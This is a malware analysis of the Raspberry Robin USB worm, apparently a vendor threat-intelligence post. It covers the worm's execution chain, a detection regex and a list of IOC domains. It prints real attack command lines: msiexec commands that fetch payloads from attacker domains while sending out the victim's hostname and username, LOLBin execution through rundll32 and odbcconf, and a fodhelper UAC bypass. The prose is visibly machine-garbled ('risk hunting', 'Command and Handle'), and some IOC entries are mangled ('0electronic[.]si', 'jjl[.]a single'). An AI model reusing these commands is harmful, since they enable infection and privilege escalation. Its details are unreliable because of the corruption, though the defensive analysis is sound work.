Raspberry Robin: Highly Evasive Worm Spreads over Outside Disks
<h2> <strong> <span> Introduction </span> </strong> </h2>
During our risk hunting exercises lately, we’ve began to observe the distinguishing pattern associated with msiexec.exe usage across different endpoints. Once we drilled to personal assets down, we discovered traces of a found out malware called Raspberry Robin recently. The RedCanary Research Team coined the name because of this malware in their post first, and Sekoia published a Flash Report concerning the activity beneath the true title of QNAP Worm. Both articles offer excellent evaluation of the malware’s behavior. Our findings assistance and enrich prior analysis on the topic.
<h2> <strong> <span> Execution Chain </span> </strong> </h2>
Raspberry Robin is really a worm that spreads more than an external travel. After initial illness, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.
<figcaption id="caption-attachment-412752" class="wp-caption-text"> Image 1: Execution chain of Raspberry Robin </figcaption>
</figure>
Let’s walkthrough the ways of the kill-chain to observe how this malware functions.
<h2> <strong> <span> Shipping and Exploitation </span> </strong> </h2>
Raspberry Robin is delivered through infected outside disks. Attached once, cmd.exe tries to execute commands from the document within that disk. This file is really a either.lnk file or perhaps a file with a particular naming pattern. Files with this particular pattern exhibit a 2 to 5 character title having an usually obscure expansion, which includes .swy , .chk , .ico, .usb, .xml, and .cfg. Furthermore, the attacker uses a lot of whitespace/non printable characters and transforming letter case in order to avoid string complementing detection techniques. Illustration command lines include:
<ul>
<li> C:WindowsSystem32cmd.exe <strong> [redacted whitespace/non printable characters] </strong> /RCmD<qjM.chK </li>
<li> C:WindowsSystem32cmd.exe <strong> [redacted whitespace/non printable characters] </strong> /rcMD <strong> <[exterior disk title] </strong> .LNk:qk </li>
<li> C:WindowsSystem32cmd.exe <strong> [redacted whitespace/non printable characters] </strong> /v /c CMd<VsyWZ.ICO </li>
<li> C:WindowsSystem32cmd.exe <strong> [redacted whitespace/non printable characters] </strong> /R C:WINDOWSsystem32cmd.exe<Gne.Swy </li>
</ul>
Document sample for delivery are available in this URL:
https://www.virustotal.com/gui/file/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/relations
Next, we observe explorer.exe running having an obscure command line argument, spawned by way of a previous instance associated with cmd.exe . This obscure argument appears to take the real name of an infected external generate or .lnk file that has been previously executed. A few of the samples acquired values which includes USB, USB DISK, or USB Drive, although some other samples experienced more particular names. On every example of explorer.exe we note that the adversary is definitely changing the letter situation to avoid detection:
<ul>
<li> ExPLORer [redacted] </li>
<li> exploREr [redacted] </li>
<li> ExplORER USB Drive </li>
<li> eXplorer USB DISK </li>
</ul>
<h2> <strong> <span> Installation </span> </strong> </h2>
After delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload. It utilizes -q or /q as well as regular installation parameter to use quietly. Again once, mixed situation letters are accustomed to bypass detection:
<ul>
<li> mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/ <strong> [11 char lengthy random string] </strong> / <strong> [computer title] </strong> = <strong> [username] </strong> </li>
<li> mSIExEC /q /i HTTP://k6j[.]PW:8080/ <strong> [11 char lengthy random string] </strong> / <strong> [computer title] </strong> = <strong> [username] </strong> </li>
<li> MSIExEC -q -I HTTP://6W[.]RE:8080/ <strong> [11 char lengthy random string] </strong> / <strong> [computer title] </strong> = <strong> [username] </strong> </li>
<li> mSIExec /Q /IhTTP://0Dz[.]Me:8080/ <strong> [11 char lengthy random string] </strong> / <strong> [computer title] </strong> = <strong> [username] </strong> </li>
<li> msIexec /Q -i http://doem[.]Re:8080/ <strong> [11 char very long random string] </strong> / <strong> [computer title] </strong> ? <strong> [username] </strong> </li>
<li> MSieXEC -Q-ihtTp://aIj[.]HK:8080/ <strong> [11 char lengthy random string] </strong> / <strong> [computer title] </strong> ? <strong> [username] </strong> </li>
</ul>
As possible above see, URLs useful for payload download have a particular pattern. Domains use 2 to 4 personality names with obscure TLDs which includes .xyz, .hk, .info, .pw, .cx, .me, and much more. URL paths possess an individual directory with a random string 11 characters longer, accompanied by hostname and the username of the victim. On network telemetry, we furthermore noticed the Windows Installer user agent because of the using msiexec.exe . To identify Raspberry Robin through its URL pattern, utilize this regex:
^http[s]0,1://[a-zA-Z0-9]2,4.[a-zA-Z0-9]2,6:8080/[a-zA-Z0-9]+/. ?(?:-|=|?). ?$
If we research the WHOIS information for given domains, back mainly because February 2015 we notice domain registration dates heading as far. From September 2021 we also see a rise on registered domains beginning, which aligns with preliminary observations of Raspberry Robin by our peers.
<table>
<colgroup>
<col />
<col /> </colgroup>
<tbody>
<tr>
<td> <strong> WHOIS Creation Date </strong> </td>
<td> <strong> Count </strong> </td>
</tr>
<tr>
<td> 12/9/2015 </td>
<td> 1 </td>
</tr>
<tr>
<td> … </td>
<td> … </td>
</tr>
<tr>
<td> 10/8/2020 </td>
<td> 1 </td>
</tr>
<tr>
<td> 11/14/2020 </td>
<td> 1 </td>
</tr>
<tr>
<td> 7/3/2021 </td>
<td> 1 </td>
</tr>
<tr>
<td> 7/26/2021 </td>
<td> 2 </td>
</tr>
<tr>
<td> 9/11/2021 </td>
<td> 2 </td>
</tr>
<tr>
<td> 9/23/2021 </td>
<td> 9 </td>
</tr>
<tr>
<td> 9/24/2021 </td>
<td> 6 </td>
</tr>
<tr>
<td> 9/26/2021 </td>
<td> 4 </td>
</tr>
<tr>
<td> 9/27/2021 </td>
<td> 2 </td>
</tr>
<tr>
<td> 11/9/2021 </td>
<td> 3 </td>
</tr>
<tr>
<td> 11/10/2021 </td>
<td> 1 </td>
</tr>
<tr>
<td> 11/18/2021 </td>
<td> 2 </td>
</tr>
<tr>
<td> 11/21/2021 </td>
<td> 3 </td>
</tr>
<tr>
<td> 12/11/2021 </td>
<td> 7 </td>
</tr>
<tr>
<td> 12/31/2021 </td>
<td> 7 </td>
</tr>
<tr>
<td> 1/17/2022 </td>
<td> 6 </td>
</tr>
<tr>
<td> 1/30/2022 </td>
<td> 11 </td>
</tr>
<tr>
<td> 1/31/2022 </td>
<td> 3 </td>
</tr>
<tr>
<td> 4/17/2022 </td>
<td> 5 </td>
</tr>
</tbody>
</table>
Table 1: Distribution of domain creation dates as time passes
Associated domains possess SSL certificates along with the subject alternative title of q74243532.myqnapcloud.com, which highlights the underlying QNAP cloud infra. Furthermore, their URL scan outcomes return login pages to QTS services of QNAP:
<figcaption id="caption-attachment-412753" class="wp-caption-text"> Image 2: QNAP QTS login web page from related domains </figcaption>
</figure>
The payload is downloaded as soon as, it really is executed through various program binaries. Initial, rundll32.exe makes use of the ShellExec_RunDLL functionality from shell32.dll to leverage program binaries such as for example msiexec.exe , odbcconf.exe , or control.exe. These binaries are accustomed to execute the payload kept in C:ProgramData [3 chars]
<ul>
<li> C:WINDOWSsystem32rundll32.exe shell32.dll ShellExec_RunDLL C:WINDOWSsyswow64MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:ProgramDataAzuwnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart </li>
<li> C:Windowssystem32RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:Windowssyswow64odbcconf.exe -s -C -a regsvr C:ProgramDataTvbzhixyye.lock. /a CONFIGSYSDSN wgdpb YNPMVSV /A CONFIGDSN dgye AVRAU pzzfvzpihrnyj </li>
<li> exe SHELL32,ShellExec_RunDLLA C:WINDOWSsyswow64odbcconf -Electronic /c /C -a regsvr C:ProgramDataEuoikdvnbb.xml. </li>
<li> C:WINDOWSsystem32rundll32.exe SHELL32,ShellExec_RunDLL C:WINDOWSsyswow64CONTROL.EXE C:ProgramDataLzmqkuiht.lkg. </li>
</ul>
The execution follows it of fodhelper.exe , which includes the auto elevated set to true. It is leveraged by adversaries to be able to bypass User Accounts Control and execute extra commands with escalated privileges [3] . To keep track of suspicious executions of fodhelper.exe, we suggest monitoring its instances without the command line arguments.
<h2> <strong> <span> Command and Handle </span> </strong> </h2>
Raspberry Robin creates its C2 channel through the excess execution of program binaries without the command range argument, which is unusual quite. That likely factors to process injection provided elevated privileges in previous measures of execution. It dllhost uses.exe , rundll32.exe, and regsvr32.exe to create a TOR connection.
<h2> <strong> <span> Detection through Global Threat Alerts </span> </strong> </h2>
In Cisco Global Risk Alerts accessible through Cisco Secure Network Analytics and Cisco Secure Endpoint , we track this activity beneath the Raspberry Robin threat object. Picture 3 displays a detection sample of Raspberry Robin:
<figcaption id="caption-attachment-412754" class="wp-caption-text"> Image 3: Raspberry Robin detection sample in Cisco Global Threat Alerts </figcaption>
</figure>
<h2> <strong> <span> Bottom line </span> </strong> </h2>
Raspberry Robin tries to stay undetected through its usage of program binaries, mixed letter situation, TOR-based C2, and abuse of compromised QNAP accounts. Although we’ve comparable intelligence gaps (how it infects exterior disks, what exactly are its activities on goal) like our peers, we have been observing its activities continuously.
<h2> <strong> <span> Indicators of Compromise </span> </strong> </h2>
<table>
<colgroup>
<col />
<col />
<col /> </colgroup>
<tbody>
<tr>
<td> <strong> Type </strong> </td>
<td> <strong> Phase </strong> </td>
<td> <strong> IOC </strong> </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> k6j[.]pw </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> kjaj[.]best </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> v0[.]cx </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> zk4[.]me </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> zk5[.]co </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> 0dz[.]me </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> 0electronic[.]si </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> 5qw[.]pw </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> 6w[.]re </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> 6xj[.]xyz </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> aij[.]hk </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> b9[.]pm </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> glnj[.]nl </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> j4r[.]xyz </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> j68[.]info </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> j8[.]si </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> jjl[.]a single </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> jzm[.]pw </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> k6c[.]org </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> kj1[.]xyz </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> kr4[.]xyz </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> l9b[.]org </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> lwip[.]re </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> mzjc[.]is </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> nt3[.]xyz </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> qmpo[.]art </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> tiua[.]uk </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> vn6[.]co </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> z7s[.]org </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> k5x[.]xyz </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> 6Y[.]rE </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> doem[.]Re </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> bpyo[.]Inside </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> l5k[.]xYZ </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> uQW[.]fUTbOL </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> t7[.]Nz </td>
</tr>
<tr>
<td> Domain </td>
<td> Payload Shipping </td>
<td> 0t[.]yT </td>
</tr>
</tbody>
</table>
<h2> <strong> <span> References </span> </strong> </h2>
<ol>
<li> Raspberry Robin gets the worm earlier - <a href="https://redcanary.com/blog/raspberry-robin/" target="_blank" rel="noopener"> https://redcanary.com/blog/raspberry-robin/ </a> </li>
<li> QNAP worm: who advantages from crime? - <a href="https://7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/FLINT%202022-016%20-%20QNAP%20worm_%20who%20benefits%20from%20crime%20(1).pdf" target="_blank" rel="noopener"> https://7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/FLINT%202022-016%20-%20QNAP%20worm_%20who%20benefits%20from%20crime%20(1).pdf </a> </li>
<li> UAC Bypass - Fodhelper - <a href="https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/" target="_blank" rel="noopener"> https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/ </a> </li>
</ol>
<pre> <code> <br>
<br>
You must be logged in to post a comment.